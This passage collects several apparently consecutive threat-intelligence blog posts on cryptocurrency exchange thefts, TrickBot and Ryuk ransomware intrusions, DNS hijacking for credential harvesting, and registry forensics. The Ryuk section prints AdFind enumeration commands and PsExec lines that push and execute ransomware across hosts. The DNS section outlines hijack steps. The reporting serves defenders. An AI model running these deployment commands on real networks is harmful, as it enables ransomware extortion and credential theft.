Unidentified actors reportedly stole $7.4 million USD from users attempting to invest during a Coindash (app platform) ICO. Coindash, which offers a trading platform for ether, launched its ICO by posting an Ethereum address to which potential investors could send funds. However, malicious actors compromised the website and replaced the legitimate address with their own ether wallet address. Coindash realized the manipulation and warned users only three minutes after the ICO began, but multiple individuals had already sent funds to the wrong wallet. This incident was the first known compromise of an ICO, which indicates the persistent creativity of malicious actors in targeting cryptocurrencies.

June 2017

Bithumb

Bithumb, a large exchange for ether and bitcoin, admitted that malicious actors stole a user database from a computer of an employee that allegedly includes the names, email addresses, and phone numbers of more than 31,800 customers. Bithumb stated that its internal network was not compromised. Bithumb suggested that actors behind this compromise used the stolen data to conduct phishing operations against the exchange's users in an attempt to steal currency from its wallets, allegedly stealing cryptocurrency worth more than $1 million USD.

April 2017

Yapizon

Unidentified actor(s) reportedly compromised four hot wallets belonging to a South Korean Bitcoin exchange, Yapizon, and stole more than 3,816 bitcoins (approximately $5 million USD). The identity of the responsible actor(s) and the method used to access the wallets remain unknown. However, Yapizon stated that there was no insider involvement in this incident.

August 2016

Bitfinex

Malicious actor(s) stole almost 120,000 bitcoins ($72 million USD at the time), from clients' accounts at Bitfinex, an exchange platform in Hong Kong. How the breach occurred remains unknown, but the exchange made some changes to its systems after regulatory scrutiny. However, some speculate that complying with the regulators' recommendations made Bitfinex vulnerable to theft.

May 2016

Gatecoin

The Hong Kong-based Gatecoin announced that as much as $2 million USD in ether and bitcoin were lost following an attack that occurred over multiple days. The company claimed that a malicious actor altered its system so ether deposit transfers went directly to the attacker's wallet during the breach.

February 2015

KipCoin

The Chinese exchange KipCoin announced that an attacker gained access to its server in 2014 and downloaded the wallet.dat file. The malicious actor stole more than 3,000 bitcoins months later.

February 2015

BTER

BTER announced via its website that it lost 7,170 bitcoins, ($1.75 million USD at the time). The company claimed that the bitcoins were stolen from its cold wallet.

December 2015

Bitstamp

Bitstamp reported that multiple operational wallets were compromised, which resulted in the loss of 19,000 bitcoins. The company received multiple phishing attempts in the months prior to the theft. One employee allegedly downloaded a malicious file that gave the attacker access to servers that contained the wallet.dat file and passphrase for the company's hot wallet.

August 2014

BTER

The China-based exchange BTER claimed that an attacker stole 50 million NXT, ($1.65 million USD at the time). The company claims the theft was possible following an attack on one of its hosting servers. The company reportedly negotiated the return of 85 percent of the stolen funds from the attacker.

July 2014

MintPal

MintPal admitted that an attacker accessed 8 million VeriCoins ($1.8 million USD) in the company's hot wallet. The attackers exploited a vulnerability in its withdrawal system that allowed them to bypass security controls to withdraw the funds.

Early 2014

Mt. Gox

Mt. Gox, one of the largest cryptocurrency exchanges, filed for bankruptcy following a theft of 850,000 bitcoins (approximately $450 million USD at the time) and more than $24 million USD from its bank accounts. A bug in the exchange's system that went unidentified for years allegedly enabled this compromise. Additionally, some speculated that an insider could have conducted the theft. Notably, recent reports revolving around the arrest of the founder of BTC-e (Alexander Vinnik) suggest he was responsible for the attack on Mt. Gox.

Table 2: Sample of observed exchange breaches

As little oversight is established for cryptocurrency exchanges and no widely accepted security standards exist for them, such incidents will likely persist. Notably, while these incidents may involve outsiders compromising exchanges' and services' systems, many of the high-profile compromises have also sparked speculations that insiders have been involved.

Software Bugs

While there has yet to be an in-the-wild attack that has caused significant harm to the Bitcoin network itself, remember the Bitcoin software is just that: software. Developers have identified 30 common vulnerabilities and exposures (CVEs) since at least 2010, many of which could have caused denial of service attacks on the network, exposure of user information, degradation of transaction integrity, or theft of funds.

The most recent software bug was a transaction validation bug that affected the consensus rules; essentially allowing miners to create transactions that weren’t properly validated and contained an extra input – which could have ultimately been exploited to create an amount of bitcoin from nothing. This vulnerability went unnoticed for two years, and fortunately was responsibly disclosed.

Running any peer-to-peer (P2P) or decentralized and distributed software is risky because each individual user has the responsibility to upgrade software when bugs are found. The more people who fail to update their software in a timely manner, the greater the chance of those nodes being exploited or used to attack the network.

Scaling & Attack Surface

At the time of this post, scaling blockchain networks to the size required to support a truly global payment system still presents a problem for the new technology and is an area of contention among developers and industry players. To address this, many developers are working on various scaling solutions. The following are some of the proposed solutions and the risks associated with each:

On-chain Scaling

One proposed suggestion is to increase the block size, which consequently shifts the cost of scaling to miners and those who operate nodes. Some argue that this could introduce the risk of centralization, because the only larger organizations that can meet the bandwidth and storage demands of ever-increasing block sizes can support this type of solution.

Off-chain Scaling

Some of the more popular blockchain scaling solutions for crypto-assets often depend on layering networks and system architectures on top of the base protocol – also referred to as “layer two” (L2) scaling. This allows users to conduct transactions “off-chain” and only occasionally synchronize them with the Bitcoin blockchain. Many argue that this is similar to how legal contracts are enforced; you don’t need to go to court each time a legal contract is written, agreed upon, and executed. And this is something that already occurs frequently in Bitcoin, as the vast majority of transactions happen offline and off-chain within large exchanges’ and merchant providers’ cold storage solutions.

However, two choices for off-chain scaling exist:

Off-chain Private Databases

This solution involves pushing transactions off-chain to a privately managed database where transaction can be settled and then occasionally synced with the Bitcoin blockchain. However, in creating this second layer of private “off-chain” transaction processing, an element of trust is introduced to the system, which unfortunately introduces risk. When transactions occur “off-chain” in a centralized private database, there is risk of improperly secured centralized ledgers that can be falsified or targeted for attack.

Off-chain Trustless Payment Channels

Another L2 solution would be to push transactions off-chain – not onto a private database, but to a trustless decentralized routing network. There are two primary L2 solutions being developed: The Liquid Network (for Bitcoin) and Raiden (for Ethereum).

However, a critique of this type of scaling solution is that the accounts used on this layer are considered hot wallets, which presents the largest attack surface. This makes it the riskiest way to store funds while also creating a valuable target for hackers. If an attacker is able to identify and access a user’s L2 node and associated wallet, they could transmit all funds out of the user’s wallet.

Lightning and Raiden as scaling solutions are still relatively new and experimental, so it’s unknown whether the they will be globally accepted as the preferred industry scaling solution. Additionally, because this layered development is still new and not widely implemented, at the time of this post there has not yet been an instance or proof of concept attack against L2 networks.

Network & Protocol Attacks

Actors may also attempt to directly exploit a cryptocurrency P2P network or cryptographic protocol to either steal cryptocurrency or disrupt a cryptocurrency network. Albeit rare, successful attacks of this nature have been observed. Examples of attack vectors that fall into this category include the following:

51% Attack

The 51% attack refers to the concept that if a single malicious actor or cohesive group of miners controlled more than 50 percent of the computing capability validating a cryptocurrency's transactions, they could reverse their own transactions or prevent transactions from being validated. While previously considered theoretical, 51% attacks have been recently observed:

  • In early April 2018, the cryptocurrency Verge reportedly suffered a 51% attack, which resulted in the attacker being able to mine 1,560 Verge coins (XVG) every second for a duration of three hours.
  • In May 2018, developers notified various cryptocurrency exchanges of a 51% attack on Bitcoin Gold. According to a report by Bitcoinist, the attack cost exchanges nearly $18 million.
  • Following the Bitcoin Gold attack, in June 2018, ZenCash became another target of the 51% attack, in which attackers siphoned $550,000 USD worth of currency from exchanges.

Companies such as NiceHash offer a marketplace for cryptocurrency cloud mining in which individuals can rent hashing power. Couple the information available from sites like Crypto51, which calculates the cost of performing 51% attacks, and it presents an attractive option for criminals seeking to disrupt cryptocurrency networks. While these types of attacks have been observed, and are no longer theoretical, they have historically posed the most risk to various alt-coins with lower network participation and hash rate. Larger, more robust, proof-of-work (PoW) networks are less likely to be affected, as the cost to perform the attack outweighs potential profit.

We anticipate that as long as the cost to perform the 51% attack and the likelihood of getting caught remains low, while the potential profit remains high, actors will continue showing interest in these types of attacks across less-robust cryptocurrency networks. 

Sybil Attack

A Sybil attack occurs when a single node claims to be multiple nodes on the P2P network, which many see as one of the greatest security risks among all large-scale, peer-to-peer networks. A notable Sybil attack (in conjunction with a traffic confirmation attack) against the Tor anonymity network occurred in 2014, spanned the course of five months, and was conducted by unknown actors.

As it pertains to cryptocurrency networks in particular, attackers performing this type of attack could perform the following:

  • Block honest users from the network by outnumber honest nodes on the network, and refusing to receive or transmit blocks.
  • Change the order of transactions, prevent them from being confirmed, or even reverse transactions that can lead to double spending by controlling a majority of the network computing power in large-scale attacks.

As described by Microsoft researcher John Douceur, many P2P networks rely on redundancy to help lower the dependence on potential hostile nodes and reduce the risk of such attacks. However, this method of mitigation falls short if an attacker impersonates a substantial fraction of the network nodes, rendering redundancy efforts moot. The suggested solution to avoiding Sybil attacks in P2P networks, as presented in the research, is to implement a logically centralized authority that can perform node identity/verification. According to the research, without implementing such a solution, Sybil attacks will always remain a threat “except under extreme and unrealistic assumptions of resource parity and coordination among entities.”

Eclipse Attack

An eclipse attack involves an attacker or group controlling a significant number of nodes and then using those nodes to monopolize inbound and outbound connections to other victim nodes, effectively obscuring the victim node’s view of the blockchain and isolating it from other legitimate peers on the network. According to security researchers, aside from disrupting the network and filtering the victim node’s view of the blockchain, eclipse attacks can be useful in launching additional attacks once successfully executed. Some of these attacks include:

  • Engineered Block Races: Block races occur in mining when two miners discover blocks at the same time. Generally, one block will be added to the chain, yielding mining rewards, while the other block is orphaned and ignored, yielding no mining reward. If an attacker can successfully eclipse attack miners, the attacker can engineer block races by hoarding blocks until a competing block has been found by non-eclipsed miners – effectively causing the eclipsed miners to waste efforts on orphaned blocks.
  • Splitting Mining Power: An attacker could use eclipse attacks to effectively cordon off fractions of miners on a network, thereby eliminating their hashing power from the network. Removing hashing power from a network allows for easier 51% attacks to occur given enough miners are effectively segmented from the network to make a 51% attack profitable.

On Jan. 5, 2019, the cryptocurrency company Coinbase detected a possible eclipse + 51% attack effecting the Ethereum Classic (ETC) blockchain. The attack involved malicious nodes surrounding Coinbase nodes, presenting them with several deep chain reorganizations and multiple double spends – totaling 219,500 ETC (worth at the time of this reporting roughly $1.1 million USD).

While eclipse attacks are difficult to mitigate across large-scale P2P networks, some fixes can make them more difficult to accomplish. FireEye recommends implementing the following, where applicable, to help reduce the risk of eclipse attacks:

  • Randomized node selection when establishing connections.
  • Retain information on other nodes previously deemed honest, and implement preferential connection to those nodes prior to randomized connections (this increases the likelihood of connecting to at least one honest node).

How the Public and Private Sector Can Help Mitigate Risk

Public Sector Priorities

As blockchain technology continues to develop, and issues like scaling, security, and identity management are addressed, it is safe to assume the ecosystem we have today will not look like the ecosystem of tomorrow. Due to this, the public sector has generally maintained a hands-off approach to allow the space to mature and innovate before implementing firm regulations. However, in the future, there are likely to be certain key areas of regulation the public sector could focus on:

  • Virtual Currencies (tax implications, asset classification)
  • Data encryption
  • Privacy
  • Identity Management (KYC and FCC)

Private Sector’s Role

Because of the public sector’s wait-and-see approach to regulation, it could be argued that the private sector should have a more active role in securing the technology as it continues to mature. Private sector leaders in software and network development, hardware manufacturing, and cyber security all have the ability to weigh in on blockchain development as it progresses to ensure user security and privacy are top priorities. Universities and independent research groups should continue to study this emerging technology as it develops.

While no widely promoted and formal security standards exist for cryptocurrency networks at the time of this post, The Cryptocurrency Certification Consortium (C4) is actively developing the Cryptocurrency Security Standard (CCSS), a set of requirements and framework to complement existing information security standards as it relates to cryptocurrencies, including exchanges, web applications, and cryptocurrency storage solutions.

Cyber Security Community

From a cyber security perspective, we should learn from the vulnerabilities of TCP/IP development in the early days of the internet, which focused more on usability and scale than security and privacy – and insist that if blockchain technology is to help revolutionize the way business and trade is conducted that those two areas of focus (security and privacy) are held at the forefront of blockchain innovation and adoption. This can be achieved through certain self-imposed (and universally agreed upon) industry standards, including:

  • Forced encryption of locally stored wallet files (instead of opt-in options).
  • Code or policy rule that requires new wallet and key generation when user performs password changes.
  • Continued development and security hardening of multi-sig wallet solutions.
  • Emphasis on and clear guidelines for responsible bug disclosure.
  • Continued security research and public reporting on security implications of both known and hypothetical vulnerabilities regarding blockchain development.
    • Analyzing protocols and implementations to determine what threats they face, and providing guidance on best practices.

Outlook

While blockchain technology offers the promise of enhanced security, it also presents its own challenges. Greater responsibility for security is often put into the hands of the individual user, and while some of the security challenges facing exchanges and online wallet providers can be addressed through existing best practices in cyber security, linking multiple users, software solutions, and integration into complex legacy financial systems creates several new cyber security paradigms.

To maintain strong network security, the roles and responsibilities of each type of participant in a blockchain network must be clearly defined and enforced, and the cyber security risks posed by each type of participant must be identified and managed. It is also critical that blockchain development teams understand the full range of potential threats that arise from interoperating with third parties and layering protocols and applications atop the base protocols.

The value and popularity of cryptocurrencies has grown significantly in the recent years, making these types of currencies a very attractive target for financially motivated actors. Many of the aforementioned examples of the various attack vectors can be of high utility in financially motivated operations. We expect cyber crime actors will continue to demonstrate high interest in targeting cryptocurrencies and their underlying network protocols for the foreseeable future.

A Nasty Trick: From Credential Theft Malware to Business Disruption

FireEye is tracking a set of financially-motivated activity referred to as TEMP.MixMaster that involves the interactive deployment of Ryuk ransomware following TrickBot malware infections. These operations have been active since at least December 2017, with a notable uptick in the latter half of 2018, and have proven to be highly successful at soliciting large ransom payments from victim organizations. In multiple incidents, rather than relying solely on built-in TrickBot capabilities, TEMP.MixMaster used EMPIRE and RDP connections to enable lateral movement within victim environments. Interactive deployment of ransomware, such as this, allows an attacker to perform valuable reconnaissance within the victim network and identify critical systems to maximize their disruption to business operations, ultimately increasing the likelihood an organization will pay the demanded ransom. These operations have reportedly netted about $3.7 million in current BTC value.

Notably, while there have been numerous reports attributing Ryuk malware to North Korea, FireEye has not found evidence of this during our investigations. This narrative appears to be driven by code similarities between Ryuk and Hermes, a ransomware that has been used by APT38. However, these code similarities are insufficient to conclude North Korea is behind Ryuk attacks, as the Hermes ransomware kit was also advertised for sale in the underground community at one time.

It is important to note that TEMP.MixMaster is solely a reference to incidents where we have seen Ryuk deployed following TrickBot infections and that not all TrickBot infections will lead to the deployment of Ryuk ransomware. The TrickBot administrator group, which is suspected to be based in Eastern Europe, most likely provide the malware to a limited number of cyber criminal actors to use in operations. This is partially evident through its use of “gtags” that appear to be unique campaign identifiers used to identify specific TrickBot users. In recent incidents investigated by our Mandiant incident response teams, there has been consistency across the gtags appearing in the configuration files of TrickBot samples collected from different victim networks where Ryuk was also deployed. The uniformity of the gtags observed across these incidents appears to be due to instances of TrickBot being propagated via the malware’s worming module configured to use these gtag values.

Currently, we do not have definitive evidence that the entirety of TEMP.MixMaster activity, from TrickBot distribution and operation to Ryuk deployment, is being conducted by a common operator or group. It is also plausible that Ryuk malware is available to multiple eCrime actors who are also using TrickBot malware, or that at least one TrickBot user is selling access to environments they have compromised to a third party.  The intrusion operations deploying Ryuk have also been called GRIM SPIDER.

TrickBot Infection Leading to Ryuk Deployment

The following are a summary of tactics observed across incident response investigations where the use of TrickBot preceded distribution of Ryuk ransomware. Of note, due to the interactive nature of Ryuk deployment, the TTPs leading to its execution can vary across incidents. Furthermore, in at least one case, artifacts related to the execution of TrickBot were collected but there was insufficient evidence to clearly tie observed Ryuk activity to the use of TrickBot.

Initial Infection

The initial infection vector was not confirmed in all incidents; in one case, Mandiant identified that the attackers leveraged a payroll-themed phishing email with an XLS attachment to deliver TrickBot malware (Figure 1). The campaign is documented on this security site. Data from FireEye technologies shows that this campaign was widely distributed primarily to organizations in the United States, and across diverse industries including government, financial services, manufacturing, service providers, and high-tech.

Once a victim opened the attachment and enabled macros, it downloaded and executed an instance of the TrickBot malware from a remote server. Data obtained from FireEye technologies suggests that although different documents may have been distributed by this particular malicious spam run, the URLs from which the documents attempted to retrieve a secondary payload did not vary across attachments or recipients, despite the campaign’s broad distribution both geographically and across industry verticals.

Subject: FW: Payroll schedule
Attachment: Payrollschedule.xls

Pay run summary report and individual payslips.
Kind Regards,
Adam Bush
CONFIDENTIALITY NOTICE:
The contents of this email message and any attachments are intended solely for the addressee(s) and may contain confidential and/or privileged information and may be legally protected from disclosure. If you are not the intended recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email and then delete this message and any attachments. If you are not the intended recipient, you are hereby notified that any use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.

Figure 1: Email from a phishing campaign that downloaded TrickBot, which eventually led to Ryuk

Persistence and Lateral Movement

When executed, TrickBot created scheduled tasks on compromised systems to execute itself and ensure persistence following system reboot. These instances of TrickBot were configured to use their network propagation modules (sharedll and tabdll) that rely on SMB and harvested credentials to propagate to additional systems in the network. The number of systems to which TrickBot was propagated varied across intrusions from fewer than ten to many hundreds.

Dwell Time and Post-Exploitation Activity

After a foothold was established by the actors controlling TrickBot, a period of inactivity sometimes followed. Dwell time between TrickBot installation and Ryuk distribution varied across intrusions, but in at least one case may have been as long as a full year. Despite this long dwell time, the earliest reports of Ryuk malware only date back to August 2018. It is likely that actors controlling Trickbot instances used to maintain access to victim environments prior to the known availability of Ryuk were monetizing this access in different ways. Further, due to the suspected human-driven component to these intrusion operations, we would expect to commonly see a delay between initial infection and Ryuk deployment or other post-exploitation activity, particularly in cases where the same initial infection vector was used to compromise multiple organizations simultaneously.

Once activity restarted, the actors moved to interactive intrusion by deploying Empire and/or leveraging RDP connections tunneled through reverse-shells instead of relying on the built-in capabilities of TrickBot to interact with the victim network. In multiple intrusions TrickBot's reverse-shell module (NewBCtestDll) was used to execute obfuscated PowerShell scripts which ultimately downloaded and launched an Empire backdoor.

Variations in Ryuk Deployment Across Engagements

Post exploitation activity associated with each Ryuk incident has varied in historical and ongoing Mandiant incident response engagements. Given that collected evidence suggests Ryuk deployment is managed via human-interactive post-exploitation, variation and evolution in methodology, tools, and approach over time and across intrusions is expected.

The following high-level steps appear common across most incidents into which we have insight:

  • Actors produce a list of targets systems and save it to one or multiple .txt files.
  • Actors move a copy of PsExec, an instance of Ryuk, and one or more batch scripts to one or more domain controllers or other high privilege systems within the victim environment.
  • Actors run batch scripts to copy a Ryuk sample to each host contained in .txt files and ultimately execute them.

Some of the notable ways Ryuk deployment has varied include:

  • In one case, there was evidence suggesting that actors enumerated hosts on the victim network to identify targets for encryption with Ryuk, but in multiple other cases these lists were manually copied to the server that was then used for Ryuk distribution without clear evidence available for how they were produced.
  • There have been multiple cases where TrickBot was deployed broadly across victim environments rather than being used to maintain a foothold on a small number of hosts.
  • We have not identified evidence that Empire was used by the attackers in all cases and sometimes Empire was used to access the victim environment only after Ryuk encryption had started.
  • In one case, the attackers used a variant of Ryuk with slightly different capabilities accompanied by a standalone .bat script containing most of the same taskkill, net, and sc commands normally used by Ryuk to terminate processes and stop services related to anti-virus, backup, and database software.

Example of Ryuk Deployment – Q3 2018

  • Using previously stolen credentials the attacker logged into a domain controller and copied tools into the %TEMP% directory. Copied tools included AdFind.exe (Active Directory enumeration utility), a batch script (Figure 2), and a copy of the 7-Zip archive utility.
  • Downloaded utilities were copied to C:\Windows\SysWOW64\.
  • The attacker performed host and network reconnaissance using built-in Windows commands.
  • AdFind.exe was executed using the previously noted batch script, which was crafted to pass the utility a series of commands that were used to collect information about Active Directory users, systems, OUs, subnets, groups, and trust objects. The output from each command was saved to an individual text file alongside the AdFind.exe utility (Figure 2).
  • This process was performed twice on the same domain controller, 10 hours apart. Between executions of Adfind the attacker tested access to multiple domain controllers in the victim environment, including the one later used to deploy Ryuk.
  • The attacker logged into a domain controller and copied instances of PSExec.exe, a batch script used to kill processes and stop services, and an instance of Ryuk onto the system.
  • Using PsExec the attacker copied the process/service killing batch script to the %TEMP% folder on hundreds of computers across the victim environment, from which it was then executed.
  • The attacker then used PsExec to copy the Ryuk binary to the %SystemRoot% directories of these same computers. A new service configured to launch the Ryuk binary was then created and started.
  • Ryuk execution proceeded as normal, encrypting files on impacted systems.

adfind.exe -f (objectcategory=person) >  <user_list>.txt

adfind.exe -f objectcategory=computer > <computer_list>.txt

adfind.exe -f (objectcategory=organizationalUnit) > <ou_list>.txt

adfind.exe -subnets -f (objectCategory=subnet) > <subnet_list>.txt

adfind.exe -f "(objectcategory=group)" > <group_list>.txt

adfind.exe -gcb -sc trustdmp >  <trustdmp>.txt

Figure 2: Batch script that uses adfind.exe tool to enumerate Active Directory objects

Example of Ryuk Deployment – Q4 2018

  • An instance of the EMPIRE backdoor launched on a system that had been infected by TrickBot. The attacker used EMPIRE’s built-in capabilities to perform network reconnaissance.
  • Attackers connected to a domain controller in the victim network via RDP and copied several files into the host’s C$ share. The copied files included an instance of PsExec, two batch scripts, an instance of the Ryuk malware, and multiple .txt files containing lists of hosts within the victim environment. Many of the targeted hosts were critical systems across the victim environment including domain controllers and other hosts providing key management and authentication services.
  • The attackers then executed the first of these two batch scripts. The executed script used PsExec and hard-coded credentials previously stolen by the actors to copy the Ryuk binary to each host passed as input from the noted .txt files (Figure 3).
  • Attackers then executed the second batch script which iterated through the same host lists and used PsExec to execute the Ryuk binaries copied by the first batch script (Figure 4).

start PsExec.exe @C:\<shared_folder>$\<list>.txt -u <domain>\<username> -p <password> cmd /c COPY "\\<shared_folder>\<ryuk_exe>" "C:\windows\temp\"

Figure 3: Line from the batch file used to copy Ryuk executable to each system

start PsExec.exe -d @C:\<shared_folder>$\<list>.txt -u <domain>\<username> -p <password> cmd /c "C:\windows\temp\<ryuk_exe>"

Figure 4: Line from the batch file used to execute Ryuk on each system

Consistency in TrickBot Group Tags

Each individual TrickBot sample beacons to its Command & Control (C2) infrastructure with a statically defined “gtag” that is believed to act as an identifier for distinct TrickBot customers. There has been significant uniformity in the gtags associated with TrickBot samples collected from the networks of victim organizations.

  • The instance of TrickBot identified as the likely initial infection vector for one intrusion was configured to use the gtag ‘ser0918us’.
    • At the time of distribution, the C2 servers responding to TrickBot samples using the gtag ‘ser0918us’ were sending commands to request that the malware scan victim networks, and then propagate across hosts via the TrickBot worming module.
    • It is possible that in some or all cases instances of TrickBot propagated via the malware’s worming module are configured to use different gtag values, specific to the same TrickBot client, designed to simplify management of implants post-exploitation.
  • A significant proportion of TrickBot samples obtained from the victim environments, including in the case where the infection vector was identified as a sample using gtag ‘ser0918us’, had gtags in the below formats. This may suggest that these gtags are used to manage post-exploitation instances of TrickBot for campaigns distributed via gtag ‘ser0918us’ and other related gtags.
    • libxxx (ex: lib373, lib369, etc)
    • totxxx (ex: tot373, tot369, etc)
    • jimxxx (ex jim373, jim369, etc)
  • The numbers appended to the end of each gtag appear to increment over time, and in some cases multiple samples sharing the same compile time but using different gtags were observed in the same victim environment, though in each of these cases the numbers appended to the end of the gtag matched (e.g. two distinct samples sharing the compile time 2018-12-07 11:28:23 were configured to use the gtags ‘jim371’ and ‘tot371’).
  • The C2 infrastructure hard-coded into these samples overlaps significantly across samples sharing similar gtag values. However, there is also C2 infrastructure overlap between these samples and ones with dissimilar gtag values. These patterns may suggest the use of proxy infrastructure shared across multiple clients of the TrickBot administrator group.

Implications

Throughout 2018, FireEye observed an increasing number of cases where ransomware was deployed after the attackers gained access to the victim organization through other methods, allowing them to traverse the network to identify critical systems and inflict maximum damage. SamSam operations, which date back to late 2015, were arguably the first to popularize this methodology and TEMP.MixMaster’s is an example of its growing popularity with threat actors. FireEye Intelligence expects that these operations will continue to gain traction throughout 2019 due the success these intrusion operators have had in extorting large sums from victim organizations.

It is also worth highlighting TEMP.MixMaster’s reliance on TrickBot malware, which is more widely distributed, to gain access to victim organizations. Following indiscriminate campaigns, threat actors can profile victims to identify systems and users of interest and subsequently determine potential monetization strategies to maximize their revenue. Various malware families have incorporated capabilities that can aid in the discovery of high-value targets underscoring the necessity for organizations to prioritize proper remediation of all threats, not only those that initially appear to be targeted.

Acknowledgements

The authors would like to thank Brice Daniels, Edward Li, Eric Montellese, Sandor Nemes, Eric Scales, Brandan Schondorfer, Martin Tremblay, Isif Ibrahima, Phillip Kealy and Steve Rasch for their contributions to this blog post.

Global DNS Hijacking Campaign: DNS Record Manipulation at Scale

Introduction

FireEye’s Mandiant Incident Response and Intelligence teams have identified a wave of DNS hijacking that has affected dozens of domains belonging to government, telecommunications and internet infrastructure entities across the Middle East and North Africa, Europe and North America. While we do not currently link this activity to any tracked group, initial research suggests the actor or actors responsible have a nexus to Iran. This campaign has targeted victims across the globe on an almost unprecedented scale, with a high degree of success. We have been tracking this activity for several months, mapping and understanding the innovative tactics, techniques and procedures (TTPs) deployed by the attacker. We have also worked closely with victims, security organizations, and law enforcement agencies where possible to reduce the impact of the attacks and/or prevent further compromises.

While this campaign employs some traditional tactics, it is differentiated from other Iranian activity we have seen by leveraging DNS hijacking at scale. The attacker uses this technique for their initial foothold, which can then be exploited in a variety of ways. In this blog post, we detail the three different ways we have seen DNS records be manipulated to enable victim compromises. Technique 1, involving the creation of a Let's Encrypt certificate and changing the A record, was previously documented by Cisco’s TALOS team. The activity described in their blog post is a subset of the activity we have observed.

Initial Research Suggests Iranian Sponsorship

Attribution analysis for this activity is ongoing. While the DNS record manipulations described in this post are noteworthy and sophisticated, they may not be exclusive to a single threat actor as the activity spans disparate timeframes, infrastructure, and service providers.

  • Multiple clusters of this activity have been active from January 2017 to January 2019.
  • There are multiple, nonoverlapping clusters of actor-controlled domains and IPs used in this activity.
  • A wide range of providers were chosen for encryption certificates and VPS hosts.

Preliminary technical evidence allows us to assess with moderate confidence that this activity is conducted by persons based in Iran and that the activity aligns with Iranian government interests.

  • FireEye Intelligence identified access from Iranian IPs to machines used to intercept, record and forward network traffic. While geolocation of an IP address is a weak indicator, these IP addresses were previously observed during the response to an intrusion attributed to Iranian cyber espionage actors.
  • The entities targeted by this group include Middle Eastern governments whose confidential information would be of interest to the Iranian government and have relatively little financial value.

Details

The following examples use victim[.]com to stand in for the victim domain, and private IP addresses to stand in for the actor controlled IP addresses.

Technique 1 – DNS A Records

The first method exploited by the attacker is altering DNS A Records, as seen in Figure 1.


Figure 1: DNS A Record

  1. The attacker logs into PXY1, a Proxy box used to conduct non-attributed browsing and as a jumpbox to other infrastructure.
  2. The attacker logs into the DNS provider’s administration panel, utilising previously compromised credentials.
  3. The A record (e.g. mail[.]victim[.]com) is currently pointing to 192.168.100.100.
  4. The attacker changes the A record and points it to 10.20.30.40 (OP1).
  5. The attacker logs in from PXY1 to OP1.
    • A proxy is implemented to listen on all open ports, mirroring mail[.]victim[.]com.
    • A load balancer points to 192.168.100.100 [mail[.]victim[.]com] to pass through user traffic.
  6. certbot is used to create a Let’s Encrypt certificate for mail[.]victim[.]com
    • We have observed multiple Domain Control Validation providers being utilised as part of this campaign.
  7. A user now visits mail[.]victim[.]com and is directed to OP1. The Let’s Encrypt certificate allows the browsers to establish a connection without any certificate errors as Let's Encrypt Authority X3 is trusted. The connection is forwarded to the load balancer which establishes the connection with the real mail[.]victim[.]com. The user is not aware of any changes and may only notice a slight delay.
  8. The username, password and domain credentials are harvested and stored.
Technique 2 – DNS NS Records

The second method exploited by the attacker involved altering DNS NS Records, as seen in Figure 2.


Figure 2: DNS NS Record

  1. The attacker again logs into PXY1.
  2. This time, however, the attacker exploits a previously compromised registrar or ccTLD.
  3. The nameserver record ns1[.]victim[.]com is currently set to 192.168.100.200. The attacker changes the NS record and points it to ns1[.]baddomain[.]com [10.1.2.3]. That nameserver will respond with the IP 10.20.30.40 (OP1) when mail[.]victim[.]com is requested, but with the original IP 192.168.100.100 if it is www[.]victim[.]com.
  4. The attacker logs in from PXY1 to OP1.
    • A proxy is implemented to listen on all open ports, mirroring mail[.]victim[.]com.
    • A load balancer points to 192.168.100.100 [mail[.]victim[.]com] to pass through user traffic.
  5. certbot is used to create a Let’s Encrypt certificate for mail[.]victim[.]com.
    • We have observed multiple Domain Control Validation providers being utilised during this campaign.
  6. A user visits mail[.]victim[.]com and is directed to OP1. The Let’s Encrypt certificate allows browsers to establish a connection without any certificate errors as Let's Encrypt Authority X3 is trusted. The connection is forwarded to the load balancer which establishes the connection with the real mail[.]victim[.]com. The user is not aware of any changes and may only notice a slight delay.
  7. The username, password and domain credentials are harvested and stored.
Technique 3 – DNS Redirector

The attacker has also been observed using a third technique in conjunction with either Figure 1 or Figure 2 above. This involves a DNS Redirector, as seen in Figure 3.


Figure 3: DNS Operational box

The DNS Redirector is an attacker operations box which responds to DNS requests.

  1. A DNS request for mail[.]victim[.]com is sent to OP2 (based on previously altered A Record or NS Record).
  2. If the domain is part of victim[.]com zone, OP2 responds with an attacker-controlled IP address, and the user is re-directed to the attacker-controlled infrastructure.
  3. If the domain is not part of the victim.com zone (e.g. google[.]com), OP2 makes a DNS request to a legitimate DNS to get the IP address and the legitimate IP address is returned to the user.

Targets

A large number of organizations have been affected by this pattern of DNS record manipulation and fraudulent SSL certificates. They include telecoms and ISP providers, internet infrastructure providers, government and sensitive commercial entities.

Root Cause Still Under Investigation

It is difficult to identify a single intrusion vector for each record change, and it is possible that the actor, or actors are using multiple techniques to gain an initial foothold into each of the targets described above. FireEye intelligence customers have received previous reports describing sophisticated phishing attacks used by one actor that also conducts DNS record manipulation. Additionally, while the precise mechanism by which the DNS records were changed is unknown, we believe that at least some records were changed by compromising a victim’s domain registrar account.

Prevention Tactics

This type of attack is difficult to defend against, because valuable information can be stolen, even if an attacker is never able to get direct access to your organization’s network. Some steps to harden your organization include:

  1. Implement multi-factor authentication on your domain’s administration portal.
  2. Validate A and NS record changes.
  3. Search for SSL certificates related to your domain and revoke any malicious certificates.
  4. Validate the source IPs in OWA/Exchange logs.
  5. Conduct an internal investigation to assess if attackers gained access to your environment.

Conclusion

This DNS hijacking, and the scale at which it has been exploited, showcases the continuing evolution in tactics from Iran-based actors. This is an overview of one set of TTPs that we recently observed affecting multiple entities. We are highlighting it now so that potential targets can take appropriate defensive action.

Digging Up the Past: Windows Registry Forensics Revisited

Introduction

FireEye consultants frequently utilize Windows registry data when performing forensic analysis of computer networks as part of incident response and compromise assessment missions. This can be useful to discover malicious activity and to determine what data may have been stolen from a network. Many different types of data are present in the registry that can provide evidence of program execution, application settings, malware persistence, and other valuable artifacts.

Performing forensic analysis of past attacks can be particularly challenging. Advanced persistent threat actors will frequently utilize anti-forensic techniques to hide their tracks and make the jobs of incident responders more difficult. To provide our consultants with the best possible tools we revisited our existing registry forensic techniques and identified new ways to recover historical and deleted registry data. Our analysis focused on the following known sources of historical registry data:

  • Registry transaction logs (.LOG)
  • Transactional registry transaction logs (.TxR)
  • Deleted entries in registry hives
  • Backup system hives (REGBACK)
  • Hives backed up with System Restore

Windows Registry Format

The Windows registry is stored in a collection of hive files. Hives are binary files containing a simple filesystem with a set of cells used to store keys, values, data, and related metadata. Registry hives are read and written in 4KB pages (also called bins).

